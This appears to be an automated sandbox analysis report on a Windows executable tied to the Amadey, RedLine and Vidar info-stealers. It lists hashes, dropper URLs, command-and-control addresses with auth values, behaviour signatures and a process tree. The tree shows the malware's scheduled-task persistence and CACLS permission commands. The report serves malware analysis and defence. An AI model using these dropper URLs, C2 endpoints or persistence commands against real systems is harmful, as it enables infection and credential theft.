Overview

overview

10

Static

static

10

d4cb3f4a55...d2.exe

windows7-x64

10

d4cb3f4a55...d2.exe

windows10-2004-x64

10

Resubmissions

09/01/2023, 12:57

230109-p64akahf8s 10

09/01/2023, 12:53

230109-p41rnahf7v 10

09/01/2023, 09:46

230109-lrmgqadg47 10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2023, 09:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe

  • Size

    235KB

  • MD5

    ddfa4b4f9123e72e7b86f10cdd994a83

  • SHA1

    5efe2f2980c2fbb50d8f44271037293402667737

  • SHA256

    d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2c9b27dd5125b15b30b4

  • SHA512

    0988ef4bb20ef54e7a8457241c4c207998c49c4664d83895e85d0359098e8c2337b6e31a2cce966516c91182604c8fc04d605c83340a569ea9fe77d7ddc71f9a

  • SSDEEP

    6144:KbxUDsiH4X/Et6xXQ31UrhfSK6uVyWVYVtGgUO:KbQOXUghSuVyWVE7

Score
10/10
amadeyredlinevidar1817@redlinevip cloud (tg: @fatherofcarders)naskopro1001pumbamicrosoftcollectiondiscoveryevasioninfostealerpersistencephishingspywarestealertrojanvmprotect

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://ciadecompras.com/stubs/Encoding.txt

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ciadecompras.com/stubs/Disable.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ciadecompras.com/SilverClient.exe

Extracted

Family

amadey

Version

3.65

C2

62.204.41.32/8bmdh3Slb2/index.php

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

redline

Botnet

pumba

C2

31.41.244.4:4062

Attributes
  • auth_value

    c0be3af49585fda61d889c3916cf186c

Extracted

Family

redline

Botnet

Naskopro1001

C2

82.115.223.15:15486

Attributes
  • auth_value

    2758e9c533872760f08a9c6118f6721e

Extracted

Family

amadey

Version

3.63

C2

62.204.41.91/8kcnjd3da3/index.php

Extracted

Family

redline

Botnet

@REDLINEVIP Cloud (TG: @FATHEROFCARDERS)

C2

151.80.89.233:13553

Attributes
  • auth_value

    fbee175162920530e6bf470c8003fa1a

Extracted

Family

vidar

Version

1.8

Botnet

817

C2

https://t.me/year2023start

https://steamcommunity.com/profiles/76561199467421923
Attributes
  • profile_id

    817

Extracted

Family

redline

Botnet

1

C2

80.66.87.22:80

Attributes
  • auth_value

    988640d4b8a8e5204910f6d6a0e74af3

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Detected phishing page
    phishing
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Blocklisted process makes network request 12 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 26 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Detected potential entity reuse from brand microsoft.
    phishingmicrosoft
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe
    "C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:448
    • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:3548
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\588b4b1c98" /P "Admin:N"&&CACLS "..\588b4b1c98" /P "Admin:R" /E&&Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:708
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          4⤵
            PID:2288
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "nbveek.exe" /P "Admin:N"
            4⤵
              PID:2788
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "nbveek.exe" /P "Admin:R" /E
              4⤵
                PID:4328
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                4⤵
                  PID:3092
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "..\588b4b1c98" /P "Admin:N"
                  4⤵
                    PID:1392
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\588b4b1c98" /P "Admin:R" /E
                    4⤵
                      PID:1356
                  • C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1128
                  • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3364
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                      4⤵
                      • Adds Run key to start application
                      • Enumerates system info in registry
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:4048
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc43ea46f8,0x7ffc43ea4708,0x7ffc43ea4718
                        5⤵
                          PID:2176
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                          5⤵
                            PID:4152
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
                            5⤵
                              PID:4640
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                              5⤵
                                PID:3408
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
                                5⤵
                                  PID:4648
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5140 /prefetch:8
                                  5⤵
                                    PID:3544
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                                    5⤵
                                      PID:1276
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:8
                                      5⤵
                                        PID:4892
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                                        5⤵
                                          PID:4836
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
                                          5⤵
                                            PID:3228
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
                                            5⤵
                                              PID:1700
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                              5⤵
                                              • Drops file in Program Files directory
                                              PID:4376
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff64c985460,0x7ff64c985470,0x7ff64c985480
                                                6⤵
                                                  PID:4628
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
                                                5⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2212
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
                                                5⤵
                                                  PID:1460
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
                                                  5⤵
                                                    PID:1428
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
                                                    5⤵
                                                      PID:5628
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
                                                      5⤵
                                                        PID:5648
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                                                        5⤵
                                                          PID:6092
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                                                          5⤵
                                                            PID:6132
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                                                            5⤵
                                                              PID:6048
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3096 /prefetch:8
                                                              5⤵
                                                                PID:5320
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1360 /prefetch:8
                                                                5⤵
                                                                  PID:5440
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6604 /prefetch:2
                                                                  5⤵
                                                                    PID:4620
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,8052772105935513340,9056451529214886183,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3248 /prefetch:8
                                                                    5⤵
                                                                      PID:1088
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                    4⤵
                                                                      PID:3060
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc43ea46f8,0x7ffc43ea4708,0x7ffc43ea4718
                                                                        5⤵
                                                                          PID:620
                                                                    • C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4212
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1212
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:5320
                                                                    • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                                                      3⤵
                                                                        PID:3224
                                                                      • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                                                        3⤵
                                                                          PID:3004
                                                                        • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                                                          3⤵
                                                                            PID:1304
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5344
                                                                          • C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:5424
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                              4⤵
                                                                                PID:5556
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc43ea46f8,0x7ffc43ea4708,0x7ffc43ea4718
                                                                                  5⤵
                                                                                    PID:5572
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                  4⤵
                                                                                    PID:5992
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc43ea46f8,0x7ffc43ea4708,0x7ffc43ea4718
                                                                                      5⤵
                                                                                        PID:6012
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:5804
                                                                                    • C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks computer location settings
                                                                                      PID:5856
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe" /F
                                                                                        5⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:5920
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:6072
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 1220
                                                                                          6⤵
                                                                                          • Program crash
                                                                                          PID:5352
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000005001\Player3.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks computer location settings
                                                                                        PID:5292
                                                                                        • C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          PID:5396
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
